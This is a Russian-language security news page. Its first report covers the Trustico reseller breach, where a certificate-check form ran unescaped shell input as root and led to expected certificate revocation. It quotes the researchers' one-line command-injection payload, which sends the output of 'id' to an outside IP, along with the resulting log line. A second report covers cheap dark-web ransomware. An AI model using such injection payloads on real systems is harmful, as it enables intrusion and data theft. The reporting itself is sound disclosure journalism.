Все сертификаты Trustico отзовут из-за полной компрометации сервера

Все сертификаты Trustico отзовут из-за полной компрометации сервера

Ранее освещенная история с проблемными сертификатами, полученными через реселлера Trustico, усугубилась новыми подробностями. В веб-интерфейсе сервиса была обнаружена уязвимость, позволяющая получить к серверу root-доступ.

Если раньше эксперты только гадали, что может быть причиной того, что Trustico решила отозвать выданные сертификаты, то сейчас ситуация начинает проясняться. Похоже, что такое решение связано с киберинцидентом, подорвавшим безопасность реселлера.

Сама брешь имеет довольно посредственный характер — допускается ввод без экранирования спецсимволов. Таким образом, если кто-либо введет в форме проверки сертификата шелл-операторы, они будут исполнены на серверы с правами root.

Об этой проблеме сообщили эксперты Manawyrm и Predrag Cujanović в Twitter.

В качестве примера специалисты приводят ввод следующую строку:

$(curl https://3.5.6.9/`id`)

Которая отправит на хост запрос:

3.5.6.9 - [01/Mar/2018:09:52:14 -0500] "GET /uid=0(root) HTTP/1.1" 404 209 "-" "curl/7.29.0"

Сообщается, что на данный момент сайт Trustico недоступен. Специалистам пока не удалось выяснить, позволяет ли данная брешь скомпрометировать приватные ключи сертификатов, однако одному из исследователей удалось найти в конфигурации секретный ключ для SSL-сертификта домена «*.trustico.com».

Следовательно, в ближайшее время DigiCert и Comodo отреагируют на инцидент, что, скорее всего, приведет к отзыву всех выданных через Trustico сертификатов.

Anti-Malware Яндекс ДзенПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

Дешевые программы-вымогатели в дарквебе меняют подходы атакующих

19 вариантов дешевых, грубо созданных программ-вымогателей сомнительного качества были обнаружены Sophos X-Ops на просторах дарквеба с июня 2023 года.  Разработчики второсортных программ вышли на теневой рынок, тем самым пошатнув устоявшуюся модель RaaS (ransomware-as-a-service).

Злоумышленники создают и продают простые варианты шифровальщиков за единовременную плату, что позволяет покупателям не тратить деньги на подписки, дополнительные инструменты и, что немаловажно, делиться прибылью.

Хакеры также видят в этом потенциал для атаки не только крупных компаний, но и предприятий среднего и малого бизнеса и даже частных лиц.

По словам директора отдела исследований угроз Sophos, Кристофера Бадда, программы-вымогатели до сих пор являются серьёзной угрозой в сфере безопасности бизнеса. За последние два года количество атак стабилизировалось, а RaaS модель остается по-прежнему основным способом работы и взаимодействия киберпреступников.

Кристофер Бадд отметил, что за последние два месяца некоторые крупнейшие продавцы троянов-вымогателей исчезли с рынка. Это может быть связано с недовольством партнеров по поводу схемы деления прибыли.

Средняя цена низкопробного вымогателя составляет 375 долларов, что намного ниже, чем при RaaS модели сотрудничества, когда прайс выходит за рамки 1000 долларов.

В основном обсуждения программ низкого качества ведутся на англоязычных форумах теневого рынка. Они зачастую предлагаются начинающим хакерам как привлекательный способ войти в мир киберпреступности и заработать деньги.

Бадд также указывает на проблему отслеживания данных преступлений. Так как киберпреступники атакуют малый и средний бизнес, размер выкупа, скорее всего, будет не так велик. Следовательно, большинство атак останутся незарегистрированными.

Мир киберпреступности не стоит на месте. И эти низкопробные версии готовых программ могут стать новой ступенью в эволюции троянов-вымогателей.

Anti-Malware Яндекс ДзенПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru